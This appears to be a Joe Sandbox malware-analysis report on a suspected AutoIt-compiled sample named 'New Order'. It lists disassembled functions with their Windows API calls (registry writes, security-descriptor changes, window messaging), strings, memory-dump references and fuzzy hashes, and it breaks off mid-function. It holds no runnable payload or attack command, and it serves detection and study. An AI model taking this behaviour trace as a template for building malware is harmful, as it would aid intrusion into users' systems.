Part of subcall function 002D912D: GetAsyncKeyState.USER32(00000001), ref: 002D9183
Part of subcall function 002D912D: GetAsyncKeyState.USER32(00000002), ref: 002D919D

SetTimer.USER32(00000000,00000000,00000028,002D90FC), ref: 002D8AA8

Strings

AutoIt v3 GUI, xrefs: 002D8A20

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: 2070d369f6df964f796054c6f85f6e81908991dba0a809337fdec4e53ca19f08
Instruction ID: 1e18b0d01a8df51ac2519275eccdd5fcf292d10ef4d826765b2cc4e7ad6f43d5
Opcode Fuzzy Hash: 2070d369f6df964f796054c6f85f6e81908991dba0a809337fdec4e53ca19f08
Instruction Fuzzy Hash: A0B16D75A1030A9FDB16DFA8CC85BEE3BB9FB48315F11411AFA15A72A0DB70A950CF50

Function 00320D8B Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 003210F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00321114
Part of subcall function 003210F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00320B9B,?,?,?), ref: 00321120
Part of subcall function 003210F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00320B9B,?,?,?), ref: 0032112F
Part of subcall function 003210F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00320B9B,?,?,?), ref: 00321136
Part of subcall function 003210F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0032114D

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00320DF5
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00320E29
GetLengthSid.ADVAPI32(?), ref: 00320E40
GetAce.ADVAPI32(?,00000000,?), ref: 00320E7A
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00320E96
GetLengthSid.ADVAPI32(?), ref: 00320EAD
GetProcessHeap.KERNEL32(00000008,00000008), ref: 00320EB5
HeapAlloc.KERNEL32(00000000), ref: 00320EBC
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00320EDD
CopySid.ADVAPI32(00000000), ref: 00320EE4
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00320F13
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00320F35
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00320F47
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00320F6E
HeapFree.KERNEL32(00000000), ref: 00320F75
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00320F7E
HeapFree.KERNEL32(00000000), ref: 00320F85
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00320F8E
HeapFree.KERNEL32(00000000), ref: 00320F95
GetProcessHeap.KERNEL32(00000000,?), ref: 00320FA1
HeapFree.KERNEL32(00000000), ref: 00320FA8

Part of subcall function 00321193: GetProcessHeap.KERNEL32(00000008,00320BB1,?,00000000,?,00320BB1,?), ref: 003211A1
Part of subcall function 00321193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00320BB1,?), ref: 003211A8
Part of subcall function 00321193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00320BB1,?), ref: 003211B7

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 4175595110-0
Opcode ID: 587043d46ba03a6c22683604e7adb126987a043ea61a9b78bbe93a2373f05e49
Instruction ID: cdcecfb4bb0025fbadc0ac177f92c200ec8208ab5d5c24f263b4db25b6548d89
Opcode Fuzzy Hash: 587043d46ba03a6c22683604e7adb126987a043ea61a9b78bbe93a2373f05e49
Instruction Fuzzy Hash: 0B715A7290031ABFDF269FA4ED44BAEBBBCFF04315F054115E919A71A2D7319A09CB60

Function 0034C3B7 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 495registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0034C4BD
RegCreateKeyExW.ADVAPI32(?,?,00000000,0035CC08,00000000,?,00000000,?,?), ref: 0034C544
RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 0034C5A4
_wcslen.LIBCMT ref: 0034C5F4
_wcslen.LIBCMT ref: 0034C66F
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 0034C6B2
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 0034C7C1
RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 0034C84D
RegCloseKey.ADVAPI32(?), ref: 0034C881
RegCloseKey.ADVAPI32(00000000), ref: 0034C88E
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 0034C960

Strings

REG_DWORD, xrefs: 0034C804
REG_QWORD, xrefs: 0034C8C3
REG_SZ, xrefs: 0034C644
REG_EXPAND_SZ, xrefs: 0034C5CD
REG_MULTI_SZ, xrefs: 0034C6F5
REG_BINARY, xrefs: 0034C913

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: Value$Close$_wcslen$ConnectCreateRegistry
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 9721498-966354055
Opcode ID: 10ceaa1dfb730767c6669eb9e03f62551ab6919b263325b0126b2186e00fc2e7
Instruction ID: 049eaa010c3a7aeeb91d0acb26104591a6e5b6e12d58f5b48ec56e82b61ec0c0
Opcode Fuzzy Hash: 10ceaa1dfb730767c6669eb9e03f62551ab6919b263325b0126b2186e00fc2e7
Instruction Fuzzy Hash: 921233356242009FDB55DF24C881E2AB7E5AF88714F15899CF88A9B3A2DB31FD41CF81

Function 0035091E Relevance: 30.1, APIs: 6, Strings: 11, Instructions: 372windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 003509C6
_wcslen.LIBCMT ref: 00350A01
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00350A54
_wcslen.LIBCMT ref: 00350A8A
_wcslen.LIBCMT ref: 00350B06
_wcslen.LIBCMT ref: 00350B81

Part of subcall function 002DF9F2: _wcslen.LIBCMT ref: 002DF9FD

Part of subcall function 00322BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00322BFA

Strings

UNCHECK, xrefs: 00350D3E
ISCHECKED, xrefs: 00350CE1
GETTOTALCOUNT, xrefs: 003509F2, 00350A17
COLLAPSE, xrefs: 00350B01, 00350B1C
GETSELECTED, xrefs: 00350C4E
EXISTS, xrefs: 00350B7C, 00350B97
SELECT, xrefs: 00350D11
CHECK, xrefs: 00350A85, 00350AA0
GETITEMCOUNT, xrefs: 00350C1E
GETTEXT, xrefs: 00350C97
EXPAND, xrefs: 00350BF8

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: _wcslen$MessageSend$BuffCharUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 1103490817-4258414348
Opcode ID: b88ada0256e484c8066a900d4fd57a99068b18d9486b0482d075bd14501f9b9a
Instruction ID: 7748c838044ff6ab29b44ff0d186508f331e0430063a4787cf78210630793a77
Opcode Fuzzy Hash: b88ada0256e484c8066a900d4fd57a99068b18d9486b0482d075bd14501f9b9a
Instruction Fuzzy Hash: 72E1BE352183019FC71AEF24C490D2AB7E2BF88315B55499DFC969B362D732ED49CB81

Function 0034C998 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 242COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,0034B6AE,?,?), ref: 0034C9B5
_wcslen.LIBCMT ref: 0034C9F1
_wcslen.LIBCMT ref: 0034CA68
_wcslen.LIBCMT ref: 0034CA9E
_wcslen.LIBCMT ref: 0034CAF9
_wcslen.LIBCMT ref: 0034CB2F
_wcslen.LIBCMT ref: 0034CB7F

Strings

HKCR, xrefs: 0034CB29, 0034CB2E
HKEY_LOCAL_MACHINE, xrefs: 0034CA62, 0034CA67
HKCU, xrefs: 0034CBCE
HKU, xrefs: 0034CBF0
HKLM, xrefs: 0034CA98, 0034CA9D
HKEY_USERS, xrefs: 0034CBDF
HKEY_CURRENT_USER, xrefs: 0034CBBD
HKEY_CLASSES_ROOT, xrefs: 0034CAF3, 0034CAF8
HKCC, xrefs: 0034CBAC
HKEY_CURRENT_CONFIG, xrefs: 0034CB79, 0034CB7E

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 1256254125-909552448
Opcode ID: c2be9d0a970638c6bf4514dae95d4a6baa70df1570414c7c31454ba4b0cda96b
Instruction ID: 081a75cc6732082e54084c88de697de0a8541f75be8fd04a72e6fdba69e4d8f2
Opcode Fuzzy Hash: c2be9d0a970638c6bf4514dae95d4a6baa70df1570414c7c31454ba4b0cda96b
Instruction Fuzzy Hash: 8871483263116A8BCB62EE3CCD415BE33D5AF60754F221528FC56AF280EA31ED41C7A0

Function 0035833C Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 196windowlibraryCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0035835A
_wcslen.LIBCMT ref: 0035836E
_wcslen.LIBCMT ref: 00358391
_wcslen.LIBCMT ref: 003583B4
LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 003583F2
LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00355BF2), ref: 0035844E
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00358487
LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 003584CA
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00358501
FreeLibrary.KERNEL32(?), ref: 0035850D
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0035851D
DestroyIcon.USER32(?,?,?,?,?,00355BF2), ref: 0035852C
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00358549
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00358555

Strings

.icl, xrefs: 00358368
.exe, xrefs: 00358388
.dll, xrefs: 003583AB

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
String ID: .dll$.exe$.icl
API String ID: 799131459-1154884017
Opcode ID: adca596923a18ed18119e85dea438f3fbf244382d71b28f5ce971fca025ff6bb
Instruction ID: 119f674810cf20b595b5907c6d82aeb5b1a72e1b284fafb48f3e8a537c20bc2c
Opcode Fuzzy Hash: adca596923a18ed18119e85dea438f3fbf244382d71b28f5ce971fca025ff6bb
Instruction Fuzzy Hash: 6261BE71550305BEEB169F65CC81FBE77ACAB04722F104609FC15E61E1EB74AA94CBA0

Function 002C7778 Relevance: 28.3, APIs: 1, Strings: 15, Instructions: 273COMMON

Download Yara Rule

Strings

#include, xrefs: 002C7847
Unterminated group of comments, xrefs: 0030528C
Bad directive syntax error, xrefs: 0030519A
#cs, xrefs: 002C7873, 002C78C5
", xrefs: 00305153
Cannot parse #include, xrefs: 00305279
#include-once, xrefs: 002C782F
#requireadmin, xrefs: 002C77FF
#notrayicon, xrefs: 002C77E7
#pragma compile, xrefs: 002C77D3
', xrefs: 00305169
#comments-start, xrefs: 002C785F, 002C78B1
#comments-end, xrefs: 002C78D9
#ce, xrefs: 002C78ED
#OnAutoItStartRegister, xrefs: 002C7817

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID:
String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 0-1645009161
Opcode ID: 5feb1c1b23a6238944b4b92ed42c15e4bf45a5487d603b6b547e1a98994fc998
Instruction ID: 8230005affaa222c6424abc2e52f43b6bd44432ecd5bbad8ee9b2a4ea558cbb8
Opcode Fuzzy Hash: 5feb1c1b23a6238944b4b92ed42c15e4bf45a5487d603b6b547e1a98994fc998
Instruction Fuzzy Hash: AB810771664205BBDB26AF60CD53FAF77A8AF15300F044129FD09AA192EB70DA25CF91

Function 00325A1B Relevance: 27.2, APIs: 18, Instructions: 198windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000063), ref: 00325A2E
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00325A40
SetWindowTextW.USER32(?,?), ref: 00325A57
GetDlgItem.USER32(?,000003EA), ref: 00325A6C
SetWindowTextW.USER32(00000000,?), ref: 00325A72
GetDlgItem.USER32(?,000003E9), ref: 00325A82
SetWindowTextW.USER32(00000000,?), ref: 00325A88
SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00325AA9
SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00325AC3
GetWindowRect.USER32(?,?), ref: 00325ACC
_wcslen.LIBCMT ref: 00325B33
SetWindowTextW.USER32(?,?), ref: 00325B6F
GetDesktopWindow.USER32 ref: 00325B75
GetWindowRect.USER32(00000000), ref: 00325B7C
MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00325BD3
GetClientRect.USER32(?,?), ref: 00325BE0
PostMessageW.USER32(?,00000005,00000000,?), ref: 00325C05
SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00325C2F

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
String ID:
API String ID: 895679908-0
Opcode ID: 45bc8d057516260814b08d668702c0c5a3068439d559c8499ba7a4ffcecb552e
Instruction ID: 24b85183555141fad01af666839510a3876c796cb5c44762c4c07d8a7b7fa92d
Opcode Fuzzy Hash: 45bc8d057516260814b08d668702c0c5a3068439d559c8499ba7a4ffcecb552e
Instruction Fuzzy Hash: EA719D31900B19EFDB22DFA8DE85AAEBBF9FF48705F104518E542A25A0D774EA40CB50

Function 003230F7 Relevance: 26.6, APIs: 8, Strings: 7, Instructions: 400COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0032318D
_wcslen.LIBCMT ref: 003231F8

Strings

CLASS, xrefs: 00323188, 003231A5
REGEXPCLASS, xrefs: 00323255, 00323266
CLASSNN, xrefs: 003231F3, 00323204
INSTANCE, xrefs: 00323453
[8, xrefs: 0032339A
TEXT, xrefs: 0032347C
NAME, xrefs: 00323335, 00323346

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: _wcslen
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT$[8
API String ID: 176396367-3359436768
Opcode ID: e8deea24456918283148b56f473d4d54242bb510ce1376c417d238d8435e285b
Instruction ID: fa2009cb2c47042c9c29d81bacaca9545bf5f57b029cae7ab930d651837aa415
Opcode Fuzzy Hash: e8deea24456918283148b56f473d4d54242bb510ce1376c417d238d8435e285b
Instruction Fuzzy Hash: FCE13732A006269BCB16EF74D441BFDBBB4BF14710F65825AE456B3240DB34AF958BD0

Function 002E00C6 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 81COMMON

Download Yara Rule

APIs

__scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 002E00C6

Part of subcall function 002E00ED: InitializeCriticalSectionAndSpinCount.KERNEL32(0039070C,00000FA0,67680B48,?,?,?,?,003023B3,000000FF), ref: 002E011C
Part of subcall function 002E00ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,003023B3,000000FF), ref: 002E0127
Part of subcall function 002E00ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,003023B3,000000FF), ref: 002E0138
Part of subcall function 002E00ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 002E014E
Part of subcall function 002E00ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 002E015C
Part of subcall function 002E00ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 002E016A
Part of subcall function 002E00ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 002E0195
Part of subcall function 002E00ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 002E01A0

___scrt_fastfail.LIBCMT ref: 002E00E7

Part of subcall function 002E00A3: __onexit.LIBCMT ref: 002E00A9

Strings

kernel32.dll, xrefs: 002E0133
WakeAllConditionVariable, xrefs: 002E0162
api-ms-win-core-synch-l1-2-0.dll, xrefs: 002E0122
InitializeConditionVariable, xrefs: 002E0148
SleepConditionVariableCS, xrefs: 002E0154

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
API String ID: 66158676-1714406822
Opcode ID: 1cef76036c0ac5114cc445fbfbbe674f3ec2dc5416645d789d81b686ca7fce5b
Instruction ID: b47e174010248121c76167537d6edbbca890cde1d36727a00675ead82b24e5f5
Opcode Fuzzy Hash: 1cef76036c0ac5114cc445fbfbbe674f3ec2dc5416645d789d81b686ca7fce5b
Instruction Fuzzy Hash: 16212C326A47416FDB175FB5AC45F6A33F8DB05B66F000126FC059A2A1DBB09C418A90

Function 003344C0 Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 309COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(00000000,00000000,0035CC08), ref: 00334527
_wcslen.LIBCMT ref: 0033453B
_wcslen.LIBCMT ref: 00334599
_wcslen.LIBCMT ref: 003345F4
_wcslen.LIBCMT ref: 0033463F
_wcslen.LIBCMT ref: 003346A7

Part of subcall function 002DF9F2: _wcslen.LIBCMT ref: 002DF9FD

GetDriveTypeW.KERNEL32(?,00386BF0,00000061), ref: 00334743

Strings

removable, xrefs: 003345EA, 003345EF
ramdisk, xrefs: 003346F1
fixed, xrefs: 00334635, 0033463A
all, xrefs: 00334531, 00334536
cdrom, xrefs: 0033458F, 00334594
network, xrefs: 0033469D, 003346A2
unknown, xrefs: 00334708

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: _wcslen$BuffCharDriveLowerType
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2055661098-1000479233
Opcode ID: dbde79fb4b89d0f02b70265454def757aa5d74fd825359642341e345f3d78b5a
Instruction ID: 0b7421b7bb1b6a249744db16b98f637b2b7d4f6d39b2b782163b96737fb5aa56
Opcode Fuzzy Hash: dbde79fb4b89d0f02b70265454def757aa5d74fd825359642341e345f3d78b5a
Instruction Fuzzy Hash: C4B1F2316083029FC712DF28C8D1A6EB7E5AFA6764F514A1DF4A6C7291E730EC44CB92

Function 0035911E Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 181windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 002D9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 002D9BB2

DragQueryPoint.SHELL32(?,?), ref: 00359147

Part of subcall function 00357674: ClientToScreen.USER32(?,?), ref: 0035769A
Part of subcall function 00357674: GetWindowRect.USER32(?,?), ref: 00357710
Part of subcall function 00357674: PtInRect.USER32(?,?,00358B89), ref: 00357720

SendMessageW.USER32(?,000000B0,?,?), ref: 003591B0
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 003591BB
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 003591DE
SendMessageW.USER32(?,000000C2,00000001,?), ref: 00359225
SendMessageW.USER32(?,000000B0,?,?), ref: 0035923E
SendMessageW.USER32(?,000000B1,?,?), ref: 00359255
SendMessageW.USER32(?,000000B1,?,?), ref: 00359277
DragFinish.SHELL32(?), ref: 0035927E
DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00359371

Strings

@GUI_DROPID, xrefs: 0035929E
@GUI_DRAGFILE, xrefs: 00359320
@GUI_DRAGID, xrefs: 003592E9
p#9, xrefs: 003592BB

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$p#9
API String ID: 221274066-793551957
Opcode ID: 830752c4b015819843d3de6ec028ba615baa1409fc2d3e404d4aa2d91e5ada0d
Instruction ID: 31426da8c7e103e51189eb2c5d5fa5879631cc9ac476ad692cabe57f887e0287
Opcode Fuzzy Hash: 830752c4b015819843d3de6ec028ba615baa1409fc2d3e404d4aa2d91e5ada0d
Instruction Fuzzy Hash: A0617A71118301AFC702DF61DC85EAFBBE9EF89754F100A1EF595921A0DB309A59CB52

Function 0034AFF9 Relevance: 24.4, APIs: 16, Instructions: 418processCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0034B198
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0034B1B0
